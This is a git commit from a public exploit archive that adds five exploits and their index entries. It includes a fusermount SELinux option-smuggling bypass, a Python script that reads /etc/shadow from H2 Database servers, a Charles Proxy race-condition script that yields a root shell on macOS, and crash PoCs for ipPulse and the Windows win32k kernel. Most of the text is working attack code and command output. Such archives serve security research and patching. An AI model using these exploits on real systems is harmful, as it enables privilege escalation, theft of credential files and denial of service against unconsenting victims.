DB: 2018-07-31

5 changes to exploits/shellcodes

fusermount - user_allow_other Restriction Bypass and SELinux Label Control
ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)
Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)

Charles Proxy 4.2 - Local Privilege Escalation

H2 Database 1.4.197 - Information Disclosure
This commit is contained in:
Offensive Security 2018-07-31 05:01:47 +00:00
parent 582d8f748e
commit b02440845e
6 changed files with 357 additions and 0 deletions

100
exploits/linux/dos/45106.c Normal file
View file

@ -0,0 +1,100 @@
/*
It is possible to bypass fusermount's restrictions on the use of the
"allow_other" mount option as follows if SELinux is active.
Here's a minimal demo, tested on a Debian system with SELinux enabled in
permissive mode:
===============================================
uuser@debian:~$ mount|grep /mount
user@debian:~$ grep user_allow_other /etc/fuse.conf
#user_allow_other
user@debian:~$ _FUSE_COMMFD=10000 fusermount -o allow_other mount/
fusermount: option allow_other only allowed if 'user_allow_other' is set in /etc/fuse.conf
user@debian:~$ _FUSE_COMMFD=10000 fusermount -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-\,allow_other' mount
sending file descriptor: Bad file descriptor
user@debian:~$ mount|grep /mount
/dev/fuse on /home/user/mount type fuse (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
===============================================
Here's a demo that actually mounts a real FUSE filesystem with allow_other,
again on a Debian system configured to use SELinux:
===============================================
user@debian:~$ cat fuse-shim.c
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>
int execv(const char *path, char *const argv_[]) {
char **argv = (void*)argv_; /* cast away const */
for (char **argvp = argv; *argvp != NULL; argvp++) {
char *arg = *argvp;
for (char *p = arg; *p; p++) {
if (*p == '#') *p = '\\';
}
}
int (*execv_real)(const char *, char *const argv[]) = dlsym(RTLD_NEXT, "execv");
execv_real(path, argv_);
}
/*
user@debian:~$ gcc -shared -o fuse-shim.so fuse-shim.c -ldl
user@debian:~$ echo hello world > hello.txt
user@debian:~$ zip hello.zip hello.txt
adding: hello.txt (stored 0%)
user@debian:~$ LD_PRELOAD=./fuse-shim.so fuse-zip -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-#,allow_other' hello.zip mount
user@debian:~$ mount|grep /mount
fuse-zip on /home/user/mount type fuse.fuse-zip (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
user@debian:~$ sudo bash
root@debian:/home/user# ls -laZ mount
total 5
drwxrwxr-x. 3 root root system_u:object_r:fusefs_t:s0-s0:c0 0 Jul 18 02:19 .
drwxr-xr-x. 30 user user system_u:object_r:unlabeled_t:s0 4096 Jul 18 02:19 ..
-rw-r--r--. 1 user user system_u:object_r:fusefs_t:s0-s0:c0 12 Jul 18 02:19 hello.txt
root@debian:/home/user# cat mount/hello.txt
hello world
===============================================
I have tested that this also works on Fedora (which, unlike Debian, has SELinux
enabled by default.)
Unfortunately, I only noticed that this was possible after I publicly sent some
fusermount hardening patches (https://github.com/libfuse/libfuse/pull/268),
when the maintainer asked a question about one of the patches.
Breaking down the attack, the problems are:
1. fusermount's do_mount() is written as if backslashes escape commas in mount
options; however, this is only true for the "fsname" and "subtype"
pseudo-options filtered out by do_mount(). Neither SELinux nor the FUSE
filesystem follow those semantics. This means that an attacker can smuggle
a forbidden option through fusermount's checks if the previous option ends
with a backslash. However, no option accepted by the FUSE filesystem can end
with a backslash, so this seemed unexploitable at first.
This is fixed by the following commit in my pull request:
https://github.com/libfuse/libfuse/pull/268/commits/455e73588357
2. fusermount uses a blacklist, not a whitelist; this blacklist does not contain
the mount options understood by the SELinux and Smack LSMs. LSMs have the
opportunity to grab mount options and make them invisible to the actual
filesystem through the security_sb_copy_data() security hook.
For this attack, I'm using the "context" option.
This is fixed by the following commit in my pull request:
https://github.com/libfuse/libfuse/pull/268/commits/d23efabfcee4
3. The SELinux LSM is slightly lax about parsing the level component of SELinux
context strings when the policy uses Multi-Level Security (MLS).
When using MLS, the format of a context string is
"<user>:<role>:<type>:<level>"; the level component is parsed by
mls_context_to_sid(). The level component is supposed to specify a
sensitivity range (one or two parts delimited with '-'); each part of the
range may be followed by ':' and a category set specification.
If the sensitivity range consists of two parts and the second part of the
range is followed by a category set, the function incorrectly marks a
trailing '-' and any following data until ':' or '\0' as consumed, but does
not actually parse this data. This allows an attacker to smuggle a backslash
through.
*/

68
exploits/linux/webapps/45105.py Executable file
View file

@ -0,0 +1,68 @@
# Exploit Title: H2 Database 1.4.197 - Information Disclosure
# Date: 2018-07-16
# Exploit Author: owodelta
# Vendor Homepage: www.h2database.com
# Software Link: http://www.h2database.com/html/download.html
# Version: all versions
# Tested on: Linux
# CVE : CVE-2018-14335
# Description: Insecure handling of permissions in the backup function allows
# attackers to read sensitive files (outside of their permissions) via a
# symlink to a fake database file.
# PS, thanks to HTB and our team FallenAngels
#!/usr/bin/python
import requests
import argparse
import os
import random
def cleanup(wdir):
cmd = "rm {}symlink.trace.db".format(wdir)
os.system(cmd)
def create_symlink(file, wdir):
cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
os.system(cmd)
def trigger_symlink(host, wdir):
outputName = str(random.randint(1000,10000))+".zip"
#get cookie
url = 'http://{}'.format(host)
r = requests.get(url)
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
url = '{}/{}'.format(url,path)
payload = {
"tool":"Backup",
"args":"-file,"+wdir+outputName+",-dir,"+wdir}
#print url
requests.post(url,data=payload).text
print "File is zipped in: "+wdir+outputName
if __name__ == "__main__":
parser = argparse.ArgumentParser()
required = parser.add_argument_group('required arguments')
required.add_argument("-H",
"--host",
metavar='127.0.0.1:8082',
help="Target host",
required=True)
required.add_argument("-D",
"--dir",
metavar="/tmp/",
default="/tmp/",
help="Writable directory")
required.add_argument("-F",
"--file",
metavar="/etc/shadow",
default="/etc/shadow",
help="Desired file to read",)
args = parser.parse_args()
create_symlink(args.file,args.dir)
trigger_symlink(args.host,args.dir)
cleanup(args.dir)

View file

@ -0,0 +1,80 @@
Charles Proxy is a great mac application for debugging web services and
inspecting SSL traffic for any application on your machine.
In order to inspect the SSL traffic it needs to configure the system to use a
proxy so that it can capture the packets and use its custom root CA to decode
the SSL.
Setting a system-wide proxy requires root permissions so this is handled by an
suid binary located within the Charles application folder:
/Applications/Charles.app/Contents/Resources/Charles Proxy Settings
Unfortunately this binary is vulnerable to a race condition which allows a local
user to spawn a root shell. It supports a parameter "--self-repair" which it
uses to re-set the root+suid permissions on itself, with a graphical dialog
shown to the user. However if this is called when the binary is already
root+suid then no password dialog is shown.
It doesn't validate the path to itself and uses a simple API call to get the
path to the binary at the time it was invoked. This means that between executing
the binary and reaching the code path where root+suid is set there is enough
time to replace the path to the binary with an alternate payload which will then
receive the suid+root permissions instead of the Charles binary.
This issue was fixed in Charles 4.2.1 released in November 2017.
https://m4.rkw.io/charles_4.2.sh.txt
2f4a2dca6563d05a201108ec6e9454e2894b603b68b3b70b8f8b043b43ee9284
-------------------------------------------------------------------------------
#!/bin/bash
####################################################
###### Charles 4.2 local root privesc exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
####################################################
cd
user="`whoami`"
cat > charles_exploit.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL);
return 0;
}
EOF
gcc -o charles_exploit charles_exploit.c
if [ $? -ne 0 ] ; then
echo "failed to compile the exploit, you need xcode cli tools for this."
exit 1
fi
rm -f charles_exploit.c
ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings
./Charles\ Proxy\ Settings --self-repair 2>/dev/null &
rm -f ./Charles\ Proxy\ Settings
mv charles_exploit Charles\ Proxy\ Settings
i=0
while :
do
r=`ls -la Charles\ Proxy\ Settings |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
i=$((i+1))
if [ $i -eq 10 ] ; then
rm -f Charles\ Proxy\ Settings
echo "Not vulnerable"
exit 1
fi
done
./Charles\ Proxy\ Settings

26
exploits/windows/dos/45102.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-07-27
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link : http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python ipPulse_1.92.py
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
# 3.- Open ippulse.exe
# 4.- Target Editor
# 5.- Paste ClipBoard on "IP Address/HostName"
# 6.- Paste ClipBoard on "Comment"
# 7.- Add Above Fields to Target List >>
# 8.- OK
# 9.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 3400
f = open ("ipPulse_1.92.txt", "w")
f.write(buffer)
f.close()

View file

@ -0,0 +1,78 @@
# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
# Author: vportal
# Date: 2018-07-27
# Vendor homepage: http://www.microsoft.com
# Version: Windows 7 x86
# Tested on: Windows 7 x86
# CVE: N/A
# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system
# call NtUserConsoleControl with the following arguments:
# NtUserControlConsole(1,0,8).
# NtUserControlConsole(4,0,8).
# NtUserControlConsole(6,0,12).
# NtUserControlConsole(2,0,12).
# NtUserControlConsole(3,0,20).
# NtUserControlConsole(5,0,8).
# Different crashes are reproduced for each case. For the second case the crash is showed below:
# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria
# en 0x%08lx. La memoria no se pudo %s.
# FAULTING_IP:
# win32k!xxxSetConsoleCaretInfo+c
# 93310641 8b0e mov ecx,dword ptr [esi]
# TRAP_FRAME: 8c747b2c -- (.trap 0xffffffff8c747b2c)
# ErrCode = 00000000
# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc
# cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010292
# win32k!xxxSetConsoleCaretInfo+0xc:
# 93310641 8b0e mov ecx,dword ptr [esi] ds:0023:00000000=????????
# Resetting default scope
# CUSTOMER_CRASH_COUNT: 1
# DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
# BUGCHECK_STR: 0x8E
# PROCESS_NAME: Win32k-fuzzer_
# CURRENT_IRQL: 0
# LAST_CONTROL_TRANSFER: from 9330fc27 to 93310641
# STACK_TEXT:
# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
# WARNING: Frame IP not in any known module. Following frames may be wrong.
# 0016f204 00000000 00000000 00000000 00000000 0x12e6766
# PoC code:
#include <Windows.h>
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...)
{
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
int _tmain(int argc, _TCHAR* argv[])
{
int st = 0;
int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7
LoadLibrary(L"user32.dll");
st = (int)SystemCall32(syscall_ID, 4, 0, 8);
return 0;
}
# The vulnerability has only been tested in Windows 7 x86.

View file

@ -6011,6 +6011,7 @@ id,file,description,date,author,type,platform,port
44958,exploits/windows/dos/44958.py,"Core FTP LE 2.2 - Buffer Overflow (PoC)",2018-07-02,"Berk Cem Göksel",dos,windows,21
44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux,
44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
@ -6030,6 +6031,8 @@ id,file,description,date,author,type,platform,port
45092,exploits/windows/dos/45092.py,"QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
45095,exploits/windows/dos/45095.py,"NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
45098,exploits/multiple/dos/45098.txt,"Skia - Heap Overflow in SkScan::FillPath due to Precision Error",2018-07-27,"Google Security Research",dos,multiple,
45102,exploits/windows/dos/45102.py,"ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)",2018-07-30,"Luis Martínez",dos,windows,
45104,exploits/windows/dos/45104.c,"Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)",2018-07-30,vportal,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9835,6 +9838,7 @@ id,file,description,date,author,type,platform,port
45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45089,exploits/linux/local/45089.py,"Intenos IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39714,3 +39718,4 @@ id,file,description,date,author,type,platform,port
45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,
45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php,
45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,

Can't render this file because it is too large.